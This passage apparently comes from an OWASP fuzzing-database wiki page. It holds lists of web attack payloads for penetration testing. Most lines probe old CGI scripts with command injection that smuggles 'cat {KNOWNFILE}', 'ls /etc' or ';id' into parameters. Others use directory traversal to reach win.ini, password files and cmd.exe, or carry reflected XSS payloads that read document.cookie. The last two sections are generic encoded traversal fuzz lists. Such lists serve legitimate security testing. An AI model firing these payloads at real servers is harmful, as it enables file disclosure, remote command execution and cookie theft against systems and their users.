fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
